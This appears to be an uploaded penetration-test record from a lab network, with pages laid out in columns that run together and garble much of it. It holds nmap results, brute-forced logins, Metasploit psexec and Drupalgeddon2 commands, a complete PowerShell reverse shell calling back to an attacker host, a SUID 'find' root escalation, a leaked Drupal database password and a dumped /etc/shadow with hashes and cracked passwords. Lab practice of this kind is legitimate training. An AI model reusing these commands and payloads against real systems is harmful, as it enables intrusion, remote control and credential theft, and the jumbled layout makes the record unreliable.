Wa0237. - 2025 01 11 22 59 250115141431
Uploaded by
saadelm86Wa0237. - 2025 01 11 22 59 250115141431
Uploaded by
saadelm8622/tcp open ssh
| ssh-hostkey:
PORT STATE SERVICE
| 3072 58:2d:1d:72:4c:72:b9:b5:a3:80:6b:74:d4:08:85:78 (RSA)
22/tcp open ssh
| 256 d1:f5:9f:6a:32:13:62:11:2b:8e:45:74:25:7e:a4:73 (ECDSA)
|_ 256 8c:de:40:e5:a7:6e:fe:43:ce:0c:a2:09:60:f5:5a:2f (ED25519)
192.168.100.67
Subtopic 2
80/tcp open http
3389/tcp open ms-wbt-server
|_http-title: WAMPSERVER Homepage
| rdp-ntlm-info:
135/tcp open msrpc
| Target_Name: EC2AMAZ-IK4QFED
139/tcp open netbios-ssn
| NetBIOS_Domain_Name: EC2AMAZ-IK4QFED
445/tcp open microsoft-ds
| NetBIOS_Computer_Name: EC2AMAZ-
3307/tcp open opsession-prxy
IK4QFED
3389/tcp open ms-wbt-server
| DNS_Domain_Name: EC2AMAZ-IK4QFED
| rdp-ntlm-info:
| DNS_Computer_Name: EC2AMAZ-IK4QFED
PORT STATE SERVICE | Target_Name: WINSERVER-01
| Product_Version: 10.0.14393
3389/tcp open ms-wbt-server | NetBIOS_Domain_Name: WINSERVER-01
|_ System_Time: 2024-11-21T10:29:53+00:00
5985/tcp open wsman | NetBIOS_Computer_Name: WINSERVER-01
|_ssl-date: 2024-11-21T10:29:53+00:00; +1s
| DNS_Domain_Name: WINSERVER-01
from scanner time.
| DNS_Computer_Name: WINSERVER-01
| ssl-cert: Subject: commonName=EC2AMAZ-
| Product_Version: 6.3.9600
IK4QFED
|_ System_Time: 2024-11-21T10:28:14+00:00
| Not valid before: 2024-11-20T10:14:59 192.168.100.63 |_ssl-date: 2024-11-21T10:28:13+00:00; 0s from
|_Not valid after: 2025-05-22T10:14:59
scanner time.
MAC Address: 06:E1:3F:65:2E:A3 (Unknown)
| ssl-cert: Subject: commonName=WINSERVER-
01
| Not valid before: 2024-11-20T10:16:45
windows |_Not valid after: 2025-05-22T10:16:45
PORT STATE SERVICE
5985/tcp open wsman
80/tcp open http
47001/tcp open winrm
135/tcp open msrpc
49152/tcp open unknown
139/tcp open netbios-ssn
80/tcp open http 49153/tcp open unknown
445/tcp open microsoft-ds
| http-methods: 49154/tcp open unknown
3307/tcp open opsession-prxy
|_ Potentially risky methods: TRACE 49155/tcp open unknown
3389/tcp open ms-wbt-server
|_http-title: IIS Windows Server 49156/tcp open unknown
5985/tcp open wsman
135/tcp open msrpc 49186/tcp open unknown
47001/tcp open winrm
139/tcp open netbios-ssn MAC Address: 06:46:AF:A2:39:83 (Unknown)
49152/tcp open unknown
445/tcp open microsoft-ds 49153/tcp open unknown
3389/tcp open ms-wbt-server Host script results:
49154/tcp open unknown
|_ssl-date: 2024-11-21T10:24:30+00:00; +1s | smb-security-mode:
49155/tcp open unknown
from scanner time. | account_used: guest
49156/tcp open unknown
| rdp-ntlm-info: | authentication_level: user
49186/tcp open unknown
| Target_Name: WINSERVER-03 | challenge_response: supported
| NetBIOS_Domain_Name: WINSERVER-03 |_ message_signing: disabled (dangerous, but
| NetBIOS_Computer_Name: WINSERVER-03 default)
| DNS_Domain_Name: WINSERVER-03 | smb-os-discovery:
| DNS_Computer_Name: WINSERVER-03 | OS: Windows Server 2012 R2 Standard 9600
| Product_Version: 10.0.17763 (Windows Server 2012 R2 Standard 6.3)
|_ System_Time: 2024-11-21T10:24:30+00:00 | OS CPE:
| ssl-cert: Subject: commonName=WINSERVER- cpe:/o:microsoft:windows_server_2012::-
03 | Computer name: WINSERVER-01
| Not valid before: 2024-11-20T10:16:07 | NetBIOS computer name: WINSERVER-01\x00
|_Not valid after: 2025-05-22T10:16:07 | Workgroup: WORKGROUP\x00
80/tcp open http
5985/tcp open wsman |_ System time: 2024-11-21T10:28:14+00:00
135/tcp open msrpc
47001/tcp open winrm | smb2-time:
139/tcp open netbios-ssn
49664/tcp open unknown | date: 2024-11-21T10:28:14
49665/tcp open unknown
445/tcp open microsoft-ds 192.168.100.50 |_ start_date: 2024-11-21T10:16:42
3389/tcp open ms-wbt-server
49666/tcp open unknown | smb2-security-mode:
5985/tcp open wsman
192.168.0.61 49667/tcp open unknown | 3.0.2:
47001/tcp open winrm
49668/tcp open unknown |_ Message signing enabled but not required
49664/tcp open unknown
49669/tcp open unknown |_nbstat: NetBIOS name: WINSERVER-01,
49665/tcp open unknown
192.168.100.57 49670/tcp open unknown NetBIOS user: <unknown>, NetBIOS MAC:
49666/tcp open unknown
49672/tcp open unknown 06:46:af:a2:39:83 (unknown)
49667/tcp open unknown
MAC Address: 06:B0:79:03:36:F3 (Unknown)
49668/tcp open unknown
49669/tcp open unknown
Host script results: Running: Microsoft Windows 7|2012|8.1
49670/tcp open unknown
| smb-security-mode: OS CPE: cpe:/o:microsoft:windows_7:::ultimate
49672/tcp open unknown
| account_used: guest cpe:/o:microsoft:windows_2012
| authentication_level: user cpe:/o:microsoft:windows_8.1
| challenge_response: supported OS details: Microsoft Windows 7, Windows
|_ message_signing: disabled (dangerous, but Server 2012, or Windows 8.1 Update 1
default)
| smb-os-discovery:
| OS: Windows Server 2019 Datacenter 17763
(Windows Server 2019 Datacenter 6.3) windows
| Computer name: WINSERVER-03
| NetBIOS computer name: WINSERVER-03\x00 [3389][rdp] host: 192.168.100.50 login: mike password: diamond
| Workgroup: WORKGROUP\x00
|_ System time: 2024-11-21T10:24:30+00:00
|_nbstat: NetBIOS name: WINSERVER-03,
NetBIOS user: <unknown>, NetBIOS MAC: PORT STATE SERVICE
06:b0:79:03:36:f3 (unknown) 192.168.100.55 21/tcp open ftp
| smb2-time: | ftp-anon: Anonymous FTP login allowed (FTP
| date: 2024-11-21T10:24:30 code 230)
|_ start_date: N/A | 04-19-22 02:25AM <DIR>
| smb2-security-mode: aspnet_client
| 3.1.1: | 04-19-22 01:19AM 1400 cmdasp.aspx
|_ Message signing enabled but not required | 04-19-22 12:17AM 99710 iis-85.png
| 04-19-22 12:17AM 701 iisstart.htm
|_04-19-22 02:13AM 22 robots.txt.txt
| ftp-syst:
[445][smb] host: 192.168.100.55 login: lawrence password: computadora |_ SYST: Windows_NT
80/tcp open http
SMB 192.168.100.55 445 WINSERVER-03 [+] WINSERVER-03\administrator:swordfish (Pwn3d!) |_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE COPY
msf6 exploit(windows/smb/psexec) > set rhosts PROPFIND DELETE MOVE PROPPATCH MKCOL
192.168.100.55 LOCK UNLOCK PUT
rhosts => 192.168.100.55 |_http-svn-info: ERROR: Script execution failed
msf6 exploit(windows/smb/psexec) > set (use -d to debug)
SMBPass swordfish | http-webdav-scan:
SMBPass => swordfish | Server Type: Microsoft-IIS/8.5
msf6 exploit(windows/smb/psexec) > set | Directory Listing:
SMBUser administrator | http://ip-192-168-100-51.me-south-
SMBUser => administrator 1.compute.internal/
msf6 exploit(windows/smb/psexec) > rub | http://ip-192-168-100-51.me-south-
[-] Unknown command: rub hosts 1.compute.internal/aspnet_client/
msf6 exploit(windows/smb/psexec) > run | http://ip-192-168-100-51.me-south-
1.compute.internal/cmdasp.aspx
| http://ip-192-168-100-51.me-south-
1.compute.internal/iis-85.png
| http://ip-192-168-100-51.me-south-
21/tcp open ftp 1.compute.internal/iisstart.htm
| ftp-anon: Anonymous FTP login allowed (FTP PORT STATE SERVICE | http://ip-192-168-100-51.me-south-
code 230) 21/tcp open ftp 1.compute.internal/robots.txt.txt
|_-rw-r--r-- 1 65534 65534 318 Apr 18 80/tcp open http |_ Server Date: Thu, 21 Nov 2024 10:29:18 GMT
2022 updates.txt 135/tcp open msrpc 135/tcp open msrpc
| ftp-syst: 139/tcp open netbios-ssn 139/tcp open netbios-ssn
| STAT: 445/tcp open microsoft-ds 445/tcp open microsoft-ds
| FTP server status: 3389/tcp open ms-wbt-server 3389/tcp open ms-wbt-server
| Connected to ::ffff:192.168.100.5 49152/tcp open unknown | rdp-ntlm-info:
| Logged in as ftp 49153/tcp open unknown | Target_Name: WINSERVER-02
| TYPE: ASCII 49154/tcp open unknown | NetBIOS_Domain_Name: WINSERVER-02
| No session bandwidth limit 49155/tcp open unknown | NetBIOS_Computer_Name: WINSERVER-02
| Session timeout in seconds is 300 49156/tcp open unknown | DNS_Domain_Name: WINSERVER-02
| Control connection is plain text | DNS_Computer_Name: WINSERVER-02
| Data connections will be plain text | Product_Version: 6.3.9600
| At session startup, client count was 4 |_ System_Time: 2024-11-21T10:28:05+00:00
| vsFTPd 3.0.3 - secure, fast, stable |_ssl-date: 2024-11-21T10:28:05+00:00; 0s from
|_End of status scanner time.
22/tcp open ssh | ssl-cert: Subject: commonName=WINSERVER-
| ssh-hostkey: 02
| 3072 | Not valid before: 2024-11-20T10:16:32
ac:09:d2:3b:55:fb:dd:e1:51:2a:dd:e7:26:68:d8:67 |_Not valid after: 2025-05-22T10:16:32
(RSA) 49152/tcp open unknown
| 256 49153/tcp open unknown
08:6a:db:14:2c:28:55:cf:32:ee:cc:d8:36:f4:2e:5b 49154/tcp open unknown
(ECDSA) 49155/tcp open unknown
|_ 256 49156/tcp open unknown
57:2e:b2:40:fe:3e:8f:c1:d1:1b:2a:f6:be:a6:bb:03 MAC Address: 06:60:63:96:7A:F7 (Unknown)
(ED25519)
80/tcp open http Host script results:
| http-ls: Volume / | smb2-security-mode:
| SIZE TIME FILENAME | 3.0.2:
| - 2018-02-21 17:28 drupal/ |_ Message signing enabled but not required
|_ | smb-security-mode:
|_http-title: Index of / | account_used: guest
139/tcp open netbios-ssn | authentication_level: user
445/tcp open microsoft-ds | challenge_response: supported
3306/tcp open mysql |_ message_signing: disabled (dangerous, but
| mysql-info: default)
| Protocol: 10 |_nbstat: NetBIOS name: WINSERVER-02,
| Version: 5.5.5-10.3.34-MariaDB- NetBIOS user: <unknown>, NetBIOS MAC:
PORT STATE SERVICE 06:60:63:96:7a:f7 (unknown)
0ubuntu0.20.04.1 21/tcp open ftp
| Thread ID: 36 | smb2-time:
22/tcp open ssh | date: 2024-11-21T10:28:05
| Capabilities flags: 63486
| Some Capabilities:
80/tcp open http 192.168.100.51 |_ start_date: 2024-11-21T10:16:21
139/tcp open netbios-ssn
IgnoreSpaceBeforeParenthesis, 445/tcp open microsoft-ds
SupportsLoadDataLocal, Support41Auth, 3306/tcp open mysql
DontAllowDatabaseTableColumn, 3389/tcp open ms-wbt-server
Speaks41ProtocolOld, ConnectWithDatabase,
IgnoreSigpipes, SupportsTransactions, Running: Microsoft Windows 2012|7|8.1
FoundRows, InteractiveClient, LongColumnFlag, OS CPE:
SupportsCompression, Speaks41ProtocolNew, cpe:/o:microsoft:windows_server_2012:r2
ODBCClient, SupportsMultipleResults, cpe:/o:microsoft:windows_7:::ultimate
SupportsAuthPlugins, cpe:/o:microsoft:windows_8.1
SupportsMultipleStatments OS details: Microsoft Windows Server 2012 R2
| Status: Autocommit Update 1, Microsoft Windows 7, Windows
| Salt: Md/YSsmFUZC}q<wes1:o Server 2012, or Windows 8.1 Update 1
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server
MAC Address: 06:54:93:2E:48:49 (Unknown) powershell -nop -W hidden -noni -ep bypass -c
"$TCPClient = New-Object
Host script results: Net.Sockets.TCPClient('192.168.100.5',
| smb-security-mode: 1337);$NetworkStream =
| account_used: guest $TCPClient.GetStream();$StreamWriter = New-
| authentication_level: user Object
| challenge_response: supported IO.StreamWriter($NetworkStream);function
|_ message_signing: disabled (dangerous, but WriteToStream ($String) {[byte[]]$script:Buffer
default) = 0..$TCPClient.ReceiveBufferSize | %
| smb2-time: revers shell http://192.168.100.51/cmdasp.aspx {0};$StreamWriter.Write($String + 'SHELL>
| date: 2024-11-21T10:24:11 ');$StreamWriter.Flush()}WriteToStream
|_ start_date: N/A '';while(($BytesRead =
| smb2-security-mode: $NetworkStream.Read($Buffer, 0,
| 3.1.1: $Buffer.Length)) -gt 0) {$Command =
|_ Message signing enabled but not required ([text.encoding]::UTF8).GetString($Buffer, 0,
|_nbstat: NetBIOS name: IP-192-168-100-, $BytesRead - 1);$Output = try {Invoke-
NetBIOS user: <unknown>, NetBIOS MAC: Expression $Command 2>&1 | Out-String}
<unknown> (unknown) catch {$_ | Out-String}WriteToStream
| smb-os-discovery: ($Output)}$StreamWriter.Close()"
| OS: Windows 6.1 (Samba 4.13.17-Ubuntu)
| Computer name: ip-192-168-100-52
| NetBIOS computer name: IP-192-168-100- windows
52\x00
| Domain name: me-south-1.compute.internal
| FQDN: ip-192-168-100-52.me-south-
1.compute.internal
|_ System time: 2024-11-21T10:24:11+00:00
use unix/webapp/drupal_drupalgeddon2
set lhost 192.168.100.5
root ! find . -exec /bin/sh -p \; -quit shell set rhosts 192.168.100.52
set targeturi /drupal/
run
linux
192.168.100.52
[22][ssh] host: 192.168.100.52 login: auditor password: qwertyuiop
[22][ssh] host: 192.168.100.52 login: dbadmin password: sayang
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupal',
'password' => 'syntex0421',
'host' => 'localhost',
'port' => '3306',
'driver' => 'mysql',
'prefix' => '',
),
),
);
cat /etc/shadow
root:$6$v8b2/P8T26uEUwvM$TBiao8o1dfqQrG
PPcebRj6A6cNiixcy6/r/AFtN5Swk7N1kpg/8UyQK
0pXFwdLfy5Ed/71VN91nJ6.3JyAN/00:18998:0:99
999:7:::
daemon:*:18960:0:99999:7:::
bin:*:18960:0:99999:7:::
sys:*:18960:0:99999:7:::
sync:*:18960:0:99999:7:::
games:*:18960:0:99999:7:::
man:*:18960:0:99999:7:::
lp:*:18960:0:99999:7:::
mail:*:18960:0:99999:7:::
news:*:18960:0:99999:7:::
uucp:*:18960:0:99999:7:::
proxy:*:18960:0:99999:7:::
www-data:*:18960:0:99999:7:::
backup:*:18960:0:99999:7:::
list:*:18960:0:99999:7:::
irc:*:18960:0:99999:7:::
gnats:*:18960:0:99999:7:::
nobody:*:18960:0:99999:7:::
systemd-network:*:18960:0:99999:7:::
systemd-resolve:*:18960:0:99999:7:::
systemd-timesync:*:18960:0:99999:7:::
messagebus:*:18960:0:99999:7:::
syslog:*:18960:0:99999:7:::
_apt:*:18960:0:99999:7:::
tss:*:18960:0:99999:7:::
root:sayang uuidd:*:18960:0:99999:7:::
tcpdump:*:18960:0:99999:7:::
auditor:qwertyuiop sshd:*:18960:0:99999:7:::
landscape:*:18960:0:99999:7:::
pollinate:*:18960:0:99999:7:::
ec2-instance-connect:!:18960:0:99999:7:::
systemd-coredump:!!:18998::::::
ubuntu:!:18998:0:99999:7:::
lxd:!:18998::::::
rtkit:*:18998:0:99999:7:::
xrdp:!:18998:0:99999:7:::
dnsmasq:*:18998:0:99999:7:::
usbmux:*:18998:0:99999:7:::
avahi:*:18998:0:99999:7:::
cups-pk-helper:*:18998:0:99999:7:::
pulse:*:18998:0:99999:7:::
geoclue:*:18998:0:99999:7:::
saned:*:18998:0:99999:7:::
colord:*:18998:0:99999:7:::
sddm:*:18998:0:99999:7:::
gdm:*:18998:0:99999:7:::
auditor:$6$RNJCCrE9ok/yCMqD$7uPoYFsrnR3w
PnSwPeLuBEiXgAzlOzGW6uZSyX.IjNNVcR5.bDB
hb.dlZTN37JJR4yZXXQTetuUhOOX9ZNov6/:190
99:0:99999:7:::
dbadmin:$6$1HAbXNNxXVVNCcoi$6Zy2gjvyZZ
YHTwSyxSLsdv0LA.5hA7EeD1WhUFzHg9SOSXrz
7DxX7iG0mCQbmEBSo.yjB1c80iIujSM6Fjbpo/:19
099:0:99999:7:::
mysql:!:19099:0:99999:7:::
ftp:*:19100:0:99999:7:::
You might also like
- Cyber Security Penetration Testing Activity v2No ratings yetCyber Security Penetration Testing Activity v210 pages
- The Ultimate Penetration Testing Command Cheat Sheet For LinuxNo ratings yetThe Ultimate Penetration Testing Command Cheat Sheet For Linux24 pages
- Hack Academys OSCP AD Cheatsheet and Notes-1No ratings yetHack Academys OSCP AD Cheatsheet and Notes-129 pages
- Advanced Security Practitioner (CASP+) (CAS-004)No ratings yetAdvanced Security Practitioner (CASP+) (CAS-004)20 pages
- Drozer Command Cheat Sheet: Starting A SessionNo ratings yetDrozer Command Cheat Sheet: Starting A Session1 page
- Penetration Testing With Kali Linux (Pen 200) - 90 Days0% (1)Penetration Testing With Kali Linux (Pen 200) - 90 Days4 pages
- HackTheBox Password Attacks - Attacking Windows Credential Manager - by Manojchandran - Jun, 2025 - MediumNo ratings yetHackTheBox Password Attacks - Attacking Windows Credential Manager - by Manojchandran - Jun, 2025 - Medium11 pages
- Windows User Mode Exploit Development: Offensive SecurityNo ratings yetWindows User Mode Exploit Development: Offensive Security9 pages
- Scripted Dish's Hashed HXBXBXBD BZBZBZBXBNo ratings yetScripted Dish's Hashed HXBXBXBD BZBZBZBXB1 page
- 40 Methods For Privilege Escalation - Part 1No ratings yet40 Methods For Privilege Escalation - Part 145 pages
- How To Install DVWA On Your Personal Machine For Testing: Instructions For Linux, Mac OS, and WindowsNo ratings yetHow To Install DVWA On Your Personal Machine For Testing: Instructions For Linux, Mac OS, and Windows3 pages
- Mcafee Network Security Platform 10.1.x Manager API Reference Guide 5-6-2022No ratings yetMcafee Network Security Platform 10.1.x Manager API Reference Guide 5-6-20221,399 pages
- CEH v10 Module 05 Vulnerability Analysis PDFNo ratings yetCEH v10 Module 05 Vulnerability Analysis PDF30 pages
- Konfigurasaun Router Rua Ba Dhcpserver (Yusuf - 2120261251)No ratings yetKonfigurasaun Router Rua Ba Dhcpserver (Yusuf - 2120261251)25 pages
- CCNPv7 ROUTE Lab5-2 IP SLA Tracking and Path Control Student Alexis PedrozaNo ratings yetCCNPv7 ROUTE Lab5-2 IP SLA Tracking and Path Control Student Alexis Pedroza24 pages
- TCP/IP Foundation For Engineers: Network +No ratings yetTCP/IP Foundation For Engineers: Network +2 pages
- Delay-And Disruption-Tolerant Networks (DTNS) : A TutorialNo ratings yetDelay-And Disruption-Tolerant Networks (DTNS) : A Tutorial35 pages
- IDOC To File Scenario Using XML HTTP Port and IDOC Bundling ConceptsNo ratings yetIDOC To File Scenario Using XML HTTP Port and IDOC Bundling Concepts7 pages
- Get The Edge An Introduction To Aruba Networking Solutions 4 Hour Lab Guide 22.212No ratings yetGet The Edge An Introduction To Aruba Networking Solutions 4 Hour Lab Guide 22.212217 pages
- Infoblox White Paper Creating A Best of Breed Ddi Solution in A Microsoft EnvironmentNo ratings yetInfoblox White Paper Creating A Best of Breed Ddi Solution in A Microsoft Environment16 pages
- 6 (TPNA SMB QA 4) Switch Advanced Function Q&ANo ratings yet6 (TPNA SMB QA 4) Switch Advanced Function Q&A8 pages
- Transparently Bridge Two Networks MikrotikNo ratings yetTransparently Bridge Two Networks Mikrotik7 pages
- Silver Peak Deployment Diagrams Visio AfNo ratings yetSilver Peak Deployment Diagrams Visio Af20 pages
- 15 - HC110110015 Basic Knowledge of IP RoutingNo ratings yet15 - HC110110015 Basic Knowledge of IP Routing14 pages
- Security Empowers Business: How It Works 2No ratings yetSecurity Empowers Business: How It Works 211 pages
- Subnetting With Practice: Cisco CCNA R&S 200-301 Network Walks AcademyNo ratings yetSubnetting With Practice: Cisco CCNA R&S 200-301 Network Walks Academy29 pages
- Chapter 4b - Network Layer - The Control PlaneNo ratings yetChapter 4b - Network Layer - The Control Plane46 pages
